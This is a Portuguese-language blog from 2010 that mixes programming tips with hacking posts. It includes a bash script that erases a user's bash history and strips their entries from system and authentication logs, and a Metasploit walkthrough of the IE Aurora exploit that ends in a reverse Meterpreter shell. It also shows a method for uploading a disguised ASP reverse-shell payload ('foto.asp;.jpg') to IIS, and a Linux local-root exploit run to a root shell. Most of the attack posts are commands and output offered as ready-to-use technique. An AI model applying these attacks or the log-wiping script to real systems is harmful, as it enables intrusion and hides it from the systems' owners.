terça-feira, 23 de março de 2010
Ruby on Rails para Javaneses
domingo, 21 de março de 2010
Apagando arquivos de Log
Segue código:
#!/bin/bash
USUARIO=$1
IP=$2
MESSAGES=/var/log/messages
FTP=/var/log/vsftpd.log
LOGIN=/var/log/wtmp
AUTH=/var/log/auth.log
if [ $# -lt 1 ] ; then
echo "uso: clean usuario [arquivo]"
exit;
fi
if [ $USUARIO == root ] ; then
echo "deletando /root/.bash_history"
rm -f /root/.bash_history
else
echo "deletando /home/"$USUARIO"/.bash_history"
rm -f /home/$USUARIO/.bash_history
fi
echo "Limpando entradas em" $MESSAGES "que correspondem ao usuario" $USUARIO
cat $MESSAGES | grep -v $USUARIO > $MESSAGES
echo "Limpando entradas em" $FTP "que correspondem ao usuario" $USUARIO
cat $FTP | grep -v $USUARIO > $FTP
echo "Limpando entradas em" $LOGIN "que correspondem ao usuario" $USUARIO
cat $LOGIN | grep -v $USUARIO > $LOGIN
echo "Limpando entradas em" $AUTH "que correspondem ao usuario" $USUARIO
cat $AUTH | grep -v $USUARIO > $AUTH
if [ $# == 2 ] ; then
echo "Limpando linhas em "$AUTH "que correspondem a" $2
cat $AUTH | grep -v $2 > $AUTH
O que o script faz é o seguinte:
primeiro ele apaga .bash_history no diretório:
/root - caso o usuário especificado como parametro seja root.
/home/usuario - caso usuário passado como parametro seja diferente de root.
/var/log/messages - registrar todas as operações do sistema ou de programas do mesmo.
/var/log/vsftpd.log - registrar todas as operações logon/logoff realizadas pelo daemon de ftp.
/var/log/wtmp - registrar os logons de usuários. É um arquivo binário que trabalha em conjunto com a função who para a identificação do usuário.
/var/log/auth.log - Registra operações de autenticações.
giorge#: clean root /var/log/dmesg
Abraços
Giorge Henrique Abdala Leia Mais…
quinta-feira, 11 de fevereiro de 2010
Apagar todas as pastas .svn
$ rm -rf `find . -type d -name .svn`
svn export DESTINO
Giorge Henrique Abdala Leia Mais…
sexta-feira, 22 de janeiro de 2010
Lançado Nmap 5.20
Confira as novidades:
30 novos engine scripts adicionados.
melhor desempenho e consumo de memória reduzido.
Protocolo específico de payload para scanners UDP mais efetivos.
engine traceroute completamente reescrita.
Update das assinaturas para detecção de versões de SO e Bancos de dados (mais de 10.000 assinaturas)
Download aqui.
Giorge Henrique Abdala
Dicas para melhorar a performance do .Net Compact Framework
Código a ser evitado:
String str = "string inicial";
for (int i = 0; i < 1000; i++) {
str += "String concatenada";
}
Código a ser usado:
StringBuilder str = new StringBuilder();
for (int i = 0; i < 1000; i ++) {
str.Append("String concatenada");
}
//classe que irá gerenciar o web service
public static class WebService() {
//instância do web service
private static WSCorreios www = null;
//método estático usado para pegar a instância do Web Service.
public static getWSCorreios() {
if (www == null)
www = new WSCorreios();
return www;
}
}
//classe que irá usar o WebService
public class usarWS() {
//construtor
public usarWS() {
}
//pega a instância do Web Service
WSCorreios www = WebService.getWSCorreios();
//usa métodos do Web Service
www.getCep();
}
}
int[] Lista = new int[100000];
for(int i = 0; i < 100000; i++) {
Lista[i] = i;
}
Melhor maneira para guardar coleções de objetos:
List Lista = new List(100000);
for(int i = 0; i < 100000; i++) {
Lista.Add(i);
}
Pior maneira para guardar qualquer coisa:
ArrayList Lista = new ArrayList(100000);
for(int i = 0; i < 100000; i++) {
Lista.Add(i);
}
####################
Referência:
http://msdn.microsoft.com/en-us/library/1766918e.aspx
http://msdn.microsoft.com/en-us/library/ms172524.aspx
Giorge Henrique Abdala
Leia Mais…
quinta-feira, 21 de janeiro de 2010
Lançado novo ProcNetMonitor
Giorge Henrique Abdala Leia Mais…
terça-feira, 19 de janeiro de 2010
Internet Explorer Aurora Exploit
para usa é fácil. É necessário ter o phyton defidamente instalado.
Windows/Linux:$ python ie_aurora.py 8080
[-] Web server is running at http://
127.0.0.1:8080/
onde:
8080 - porta local
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
O payload usado abre uma conexão reversa no alvo. Em seguida abra o IE e acesse o endereço mostrado (http://192.168.0.151:8080/).
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
Pronto. Você já tem acesso shell disponível no alvo.
################
Referências:
http://www.microsoft.com/technet/security/advisory/979352.mspx
Giorge Henrique Abdala Leia Mais…
quinta-feira, 14 de janeiro de 2010
TCC Metasploit
Esse achei na net há pouco tempo. É um TCC produzido pelo Julio Cesar Liviero Della Flora para a UniFil de londrina. É um trabalho muito bem estruturado, com explicações e várias imagens. Ponto de partida para qualquer um que deseja iniciar na área de testes de vulnerabilidades.
http://www.4shared.com/file/164179969/d59dfd55/TCC_JULIO.html
PS: não é pirataria. O trabalho foi disponibilizado na rede pelo próprio autor.
Giorge Henrique Abdala
Impedindo o Acesso sem senha
As maneiras mais conhecidas para entrar no sistema sem senha são:
1. disquete de boot.
2. trocando o runlevel para 1 (Single ou manutenção).
3. Trocando o runlevel para `init=/bin/bash`.
1. Edite o /etc/inittab e verifique se existe uma linha parecida com:
su:S:wait:/etc/rc.d/rc.sulogin
sulogin -p
*/Para forçar o sistema a pedir a senha root sempre que for iniciado no modo manutenção*/
#grub
*/criptografa uma senha ser usada no grub*/
grub> md5crypt
*/digite a senha a ser criptografada*/
password: *********
A saída do comando será a senha criptografada, algo como:
encrypted: $1$2atu01$qdxmcgaxxw0pehytdvixo.
Edite o arquivo /boot/grub/menu.lst, e adicione, no início do arquivo, a seguinte linha:
password = --md5
A Opção de senha também pode ser usada com o Lilo.
* info grub, man lilo
* GRUB
* Lilo HOWTO
Giorge Henrique Abdala
Leia Mais…
Novo repositório de exploits
O novo repositório contém as mesmas categorias que o milw0rm (remote, local, web, dos e shellcode) e, aparentemente, está bem atualizado, contando, hoje, com 10309 exploits.
usem com moderação: http://www.exploit-db.com/
Giorge Henrique Abdala Leia Mais…
quarta-feira, 13 de janeiro de 2010
Enviando um trojan para o IIS - Upload de arquivos
Um arquivo com o nome foto.asp;.jpg por exemplo, irá passar por uma aplicação como sendo um .JPG, porém, quando o IIS executar sua análise irá parar no .asp e imediamente executar o arquivo.
Vamos ao exemplo.
Primeiro gere o .ASP contendo o payload desejado.
Windows/Linux:$ msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 R | msfencode -o foto.asp
onde:
msfpayload/meterpreter/reverse_tcp - Localização do payload desejado. No exemplo foi utilizado o reverse_tcp que abre uma conexão remota reversa no host e porta especificado.
LHOST - Seu endereço ip para a conexão reversa.
LPORT - A porta onde você ficará esperando a conexão reversa.
R | msfencode -o payload.asp - passa o fluxo de dados para o msfencode e gera um arquivo "foto.asp" com o código do payload.
Para aplicações que verificam o tipo do arquivo antes de enviar basta usar o cat:
Linux:$ cat foto.jpg payload.asp > "foto.asp;.jpg"
Isso irá juntar um arquivo jpg ao seu payload. É possível verificar o tipo do arquivo com:
Linux:$ file foto.asp;.jpg
fts.jpg: JPEG image data, JFIF standard 1.01
Inicie o console do metasploit e coloque sua máquina para "esperar" a conexão reversa.
$ msfconsole
msf> use exploit/multi/handler
msf (handler)> set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler)> set LHOST 127.0.0.1
msf (handler)> set LPORT 3333
msf (handler)> set ExitOnSession false
msf (handler)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Starting the payload handler...
[*] Started reverse handler on port 3333
Pronto, agora é só executar o arquivo .asp pelo navegador que você verá algo do tipo no console do metasploit:
[*] Sending stage (723456 bytes)
msf exploit(handler) > [*] Meterpreter session 1 opened (189.26.20.122:3333 -> 201.53.3.20:4768)
Isso significa que a conexão foi estabelecida com sucesso.
depois é só abrir a sessão e chamar o shell.
msf exploit(handler)> sessions -i 1
[*] Starting interaction with 1...
meterpreter> shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:windowssystem32inetsrv>
###############################
Sem mais...
Referências:
http://www.metasploit.org/
http://blog.metasploit.com/
http://blog.rapid7.com/
Giorge Henrique Abdala Leia Mais…
Lançado Backtrack 4 final
Download: http://www.backtrack-linux.org/downloads/
Giorge Henrique Abdala Leia Mais…
sábado, 9 de janeiro de 2010
Kernel Linux exploit - Local root
Download do exploit em: http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
Depois é só compilar com o gcc e executar para virar root imediatamente.
Veja o teste no meu sistema.
/exploit$ gcc -Wall -o linux-sendpage linux-sendpage.c linux-sendpage.c:374:6: aviso: nenhuma linha-nova no fim do arquivo /exploit$ ./linux-sendpage sh-3.2#
####################### Correção: Infelizmente, creio que só compilando o
kernel com o path atualizado. Se você usa debian,
ubuntu, ou similares veja em http://kernelsec.cr0.org/
Referências: http://kbase.redhat.com/faq/docs/DOC-18042 http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
Giorge Henrique AbdalaLeia Mais…
sexta-feira, 8 de janeiro de 2010
Mssqlfp - Microsoft SQL Server Fingerprint Tool
Segue resultado de um teste que fiz:
Windows:$ mssqlfp-BETA4 -d HOST
MSSQLFP Version 1.00.BETA-4 [Built on Jan 8 2010 20:36:54].
Loading Microsfot SQL Server Fingerprinter Engine [SQLFPENG].
Module SQLFPENG [1.10.0108] loaded
Module SQLFPENG reported: Connection timed out.
Module SQLFPENG failed to perform SQL Server UDP Fingerprint.
Module SQLFPENG found SQL Server TCP Fingerprint Version [8.00.818].
Module SQLFPENG found SQL Server Version [Microsoft SQL 2000 SP3+Q821277/337/818388/826161/821280].
Module SQLFPENG found SQL Server default TCP Communication Port [1433].
Module SQLFPENG succeeded to detect Microsoft SQL Server Version [100%].
Unloading Microsfot SQL Server Fingerprinter Engine [SQLFPENG].
Module SQLFPENG [1.10.0108] unloaded on Wednesday [Jan 13 03:31:42 2010].
Module SQLFPENG succeeded after 01 tentative [Elapsed time: 00:00:00].
No caso a versão achada foi Microsoft SQL 2000 SP3+Q821277/337/818388/826161/821280 rodando na porta padrão (1433).
Download: http://mssqlfp.googlecode.com/files/mssqlfp-BETA4.exe
Giorge Henrique Abdala
Leia Mais…